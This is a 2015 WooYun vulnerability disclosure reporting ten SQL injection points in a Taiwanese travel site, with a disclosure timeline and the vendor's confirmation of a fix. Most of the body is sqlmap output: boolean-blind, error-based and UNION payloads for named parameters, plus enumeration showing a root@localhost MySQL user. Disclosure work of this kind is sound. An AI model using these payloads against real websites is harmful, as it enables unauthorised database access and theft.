当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157961

漏洞标题:清境旅遊資訊網_Www站点sql注入打包(10处注入)(臺灣地區)

相关厂商:清境旅遊資訊網

漏洞作者: 路人甲

提交时间:2015-12-04 15:40

修复时间:2016-01-05 19:09

公开时间:2016-01-05 19:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

清境旅遊資訊網_Www站点sql注入打包
5处get注入,5处post

详细说明:

第一处:

http://**.**.**.**/cja/newscj/newsview.asp?nsid=1736


Place: GET
Parameter: nsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nsid=1736 AND 4174=4174
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: nsid=1736 AND (SELECT 8264 FROM(SELECT COUNT(*),CONCAT(0x3a6f6
,(SELECT (CASE WHEN (8264=8264) THEN 1 ELSE 0 END)),0x3a7578663a,FLOOR(RAND
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 62 columns
Payload: nsid=-3819 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NU
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3
7a3a,0x6c4f4e51715247765475,0x3a7578663a), NULL, NULL, NULL, NULL, NULL, NU
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[14:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[14:16:53] [INFO] fetching current user
current user: 'root@localhost'


第二处:

http://**.**.**.**/restaurant/shop.asp?lno=74


Place: GET
Parameter: lno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lno=74 AND 8736=8736
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: lno=74 AND (SELECT 7739 FROM(SELECT COUNT(*),CONCAT(0x3a796
ELECT (CASE WHEN (7739=7739) THEN 1 ELSE 0 END)),0x3a6376643a,FLOOR(RAND
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[14:25:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[14:25:00] [INFO] fetching current user
[14:25:00] [INFO] retrieved: root@localhost
current user: 'root@localhost'


第三处:

http://**.**.**.**/album/photo_list.asp?p1no=68


[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[14:16:53] [INFO] fetching current user
current user: 'root@localhost'


第四处:

http://**.**.**.**/trip/trip.asp?tno=63


[INFO] fetching current user
[14:25:00] [INFO] retrieved: root@localhost
current user: 'root@localhost'


第五处:

http://**.**.**.**/restaurant/shop.asp?sno=52


current user:    'root@localhost '


=======================================================
接下来全是post注入
第一处:

6JOIM%OHNHNU]Y9]89A8F$H.jpg


第二处:

(VVFEYE)~ZHZ54JN5H6HJU8.png


第三处:

P]3AA]V5[SE)8ZV)($XRFSV.jpg


第四处:

P]EY_X0DV[{V2KW4C`X5G71.png


第五处:

48XR@9OB5T@[~A{H8UD7{OB.png


跑出来的结果总结在这里,一个个贴太麻烦了

Place: POST
Parameter: searchWord
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: searchWord=1') AND (SELECT 9786 FROM(SELECT COUNT(*),CONCAT(0x3a677
5713a,(SELECT (CASE WHEN (9786=9786) THEN 1 ELSE 0 END)),0x3a6571793a,FLOOR(RAND
(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('oUPx'='oUPx&
Submit=????
---
[14:32:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[14:32:42] [INFO] fetching current user
[14:32:43] [INFO] retrieved: root@localhost
current user: 'root@localhost'


漏洞证明:

current user: 'root@localhost

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2015-12-08 06:15

厂商回复:

感謝通報

最新状态:

2016-01-05:確認修復